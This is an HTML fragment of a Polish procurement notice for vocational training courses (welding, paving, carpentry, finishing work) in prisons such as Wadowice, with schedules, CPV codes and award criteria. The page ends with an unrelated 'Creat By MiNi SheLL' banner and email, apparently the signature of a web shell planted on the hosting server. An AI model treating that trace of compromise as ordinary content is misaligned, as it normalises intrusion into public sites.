                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Technolog robót wykończeniowych w budownictwie
Technolog robót wykończeniowych w budownictwie
Brukarz
Spawacz MIG/MAG
Brukarz
Stolarz
Brukarz
Grupy szkoleniowe składają się z 12 osób. Czas trwania każdego cyklu szkoleniowego (kursu) winien wynosić przeciętnie od 180 do 210 godzin dydaktycznych.  Określenie innego czasu trwania kursu wymaga pisemnej zgody Zamawiającego. Cykl szkoleniowy winien zostać zrealizowany w okresie do 40 dni od dnia jego rozpoczęcia. Zajęcia powinny odbywać się od poniedziałku do piątku w godzinach od 8.00 do 16.30 (zróżnicowane w zależności od jednostki). W sytuacjach wyjątkowych, za zgodą Dyrektora jednostki penitencjarnej, zajęcia mogą odbywać się również w soboty.   
Miejsce przeprowadzenia zajęć   pomieszczenia lekcyjne  i teren do zajęć praktycznych w jednostce<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8, 80562000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>liczba zatrudnionych skazanych</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>11
                  
                <b>Nazwa: </b>Przeprowadzenie 7 szkoleń w Zakładzie Karnym w Wadowicach<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Spawacz MIG/MAG
Technolog robót wykończeniowych w budownictwie
Technolog robót wykończeniowych w budownictwie
Brukarz
Technolog robót wykończeniowych w budownictwie
Spawacz MIG/MAG
Technolog robót wykończeniowych w budownictwie
Grupy szkoleniowe składają się z 12 osób. Czas trwania każdego cyklu szkoleniowego (kursu) winien wynosić przeciętnie od 180 do 210 godzin dydaktycznych.  Określenie innego czasu trwania kursu wymaga pisemnej zgody Zamawiającego. Cykl szkoleniowy winien zostać zrealizowany w okresie do 40 dni od dnia jego rozpoczęcia. Zajęcia powinny odbywać się od poniedziałku do piątku w godzinach od 8.00 do 16.30 (zróżnicowane w zależności od jednostki). W sytuacjach wyjątkowych, za zgodą Dyrektora jednostki penitencjarnej, zajęcia mogą odbywać się również w soboty.   
Miejsce przeprowadzenia zajęć   pomieszczenia lekcyjne  i teren do zajęć praktycznych w jednostce.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8, 80562000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>liczba zatrudnionych skazanych</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com